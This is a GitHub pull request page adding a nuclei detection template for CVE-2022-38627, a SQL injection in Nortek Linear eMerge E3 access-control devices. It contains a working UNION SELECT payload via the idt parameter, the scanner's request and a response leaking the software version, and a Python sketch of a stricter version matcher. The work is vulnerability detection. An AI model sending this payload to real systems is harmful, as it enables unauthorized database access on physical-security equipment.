
@daffainfo
Contributor

Template / PR Information

Nortek Linear eMerge E3-Series 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e were discovered to contain a SQL injection vulnerability via the idt parameter.

Template Validation

I've validated this template locally?

  • YES
  • NO

Debug


                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support.
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2022-38627] Dumped HTTP request for http://REDACTED/badging/badge_template_print.php?tpl=aa.xml&idt=1337%20UNION%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,%27%20SWVersion:%27||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20version

GET /badging/badge_template_print.php?tpl=aa.xml&idt=1337%20UNION%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,%27%20SWVersion:%27||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20version HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2022-38627] Dumped HTTP response http://REDACTED/badging/badge_template_print.php?tpl=aa.xml&idt=1337%20UNION%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,%27%20SWVersion:%27||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20version

HTTP/1.1 200 OK
Connection: close
Content-Length: 1359
Content-Type: text/html; charset=UTF-8
Date: Tue, 23 Sep 2025 07:38:08 GMT
Server: lighttpd/1.4.22
X-Powered-By: PHP/7.3.8


<head>
<script type="text/javascript" src="/js/jquery-1.8.3.min.js"></script>
    <script type="text/javascript">
         $("#btnPrint").live("click", function () {
             var divContents = $("#preview").html();
             var printWindow = window.open('', '', 'height=204px,width=324px');
             // printWindow.document.write('<html><head><title>DIV Contents</title>');
             // printWindow.document.write('</head><body >');
             printWindow.document.write(divContents);
             //printWindow.document.write('</body></html>');
             printWindow.document.close();
             printWindow.print();
         });
    </script>

    <link rel="shortcut icon" href="../img/emerge.ico">
</head>    
<div id='preview' style='width:324px; height:204px; border:2px black solid'><span style='position:absolute; margin-top:0px; margin-left:0px;'><img src='bg/' width=324px height=204px/></span><span id='logo' style='position:absolute; margin-top:px; margin-left:px; '><img width=0px height=0px src='logo/' id='logopict'/></span><span id='pict' style='position:absolute; margin-top:px; margin-left:px; '><img src=../user_img/ SWVersion:0.32-09c width='110px' height='130px'/></span></div><div><input type='button' value='Print Badge' id='btnPrint' style='width:120; height:30; background-color:#2E2E2E; color:#D8D8D8' ></div>
[CVE-2022-38627:word-1] [http] [critical] http://REDACTED/badging/badge_template_print.php?tpl=aa.xml&idt=1337%20UNION%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,%27%20SWVersion:%27||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20version
[CVE-2022-38627:word-2] [http] [critical] http://REDACTED/badging/badge_template_print.php?tpl=aa.xml&idt=1337%20UNION%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,%27%20SWVersion:%27||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20version
[CVE-2022-38627:status-3] [http] [critical] http://REDACTED/badging/badge_template_print.php?tpl=aa.xml&idt=1337%20UNION%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,%27%20SWVersion:%27||SWVersion,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20version
[INF] Scan completed in 579.67375ms. 3 matches found.

@princechaddha princechaddha added the Done Ready to merge label Sep 24, 2025
@princechaddha
Member

@daffainfo I have updated the POC because the matcher was only looking for a string in the GET parameters instead of the extracted version value, which could match patched versions or produce false positives. I have updated the payload and matcher to make sure the SQLi is happening.
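
The false-positive case raised in the comment above, shown as an added example (not part of the PR or the merged template): a word matcher on a literal that also appears in the request fires on any response that echoes the parameter, while a matcher on the extracted version value does not. The version regex and the "reflected" response body are assumptions made for illustration; both sample bodies are constructed.

```python
import re

# Affected builds as listed in the PR description.
AFFECTED = {"0.32-08f", "0.32-07p", "0.32-07e", "0.32-09c",
            "0.32-09b", "0.32-09a", "0.32-08e"}

# Assumed version shape (digits.digits-digits+letter), inferred from the
# values on this page; not taken from the merged template.
VERSION_RE = re.compile(r"SWVersion:(\d+\.\d+-\d+[a-z])\b")


def naive_match(status, body):
    """Word matcher on a string that is also present in the request."""
    return status == 200 and "SWVersion:" in body


def strict_match(status, body):
    """Require a value the database produced, not just the echoed literal.

    Returns the extracted version string, or None when nothing matched.
    """
    if status != 200:
        return None
    m = VERSION_RE.search(body)
    return m.group(1) if m else None


def classify(status, body):
    """Map a response to a triage verdict based on the extracted version."""
    version = strict_match(status, body)
    if version is None:
        return "no-evidence"
    return "affected" if version in AFFECTED else "unlisted-version"


# Constructed sample bodies (not captured traffic).
VULNERABLE_BODY = ("<span id='pict'><img src=../user_img/ SWVersion:0.32-09c "
                   "width='110px' height='130px'/></span>")
# Hypothetical fixed build that rejects the input but echoes it back.
REFLECTED_BODY = ("<p>Invalid idt: 1337 UNION SELECT NULL,"
                  "' SWVersion:'||SWVersion from version</p>")

if __name__ == "__main__":
    for name, body in (("vulnerable", VULNERABLE_BODY),
                       ("reflected", REFLECTED_BODY)):
        print(name, naive_match(200, body), classify(200, body))
```
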

@princechaddha princechaddha merged commit a2a1635 into projectdiscovery:main Sep 24, 2025
3 checks passed
@algora-pbc

algora-pbc bot commented Sep 25, 2025

🎉🎈 @daffainfo has been awarded $200 by ProjectDiscovery! 🎈🎊
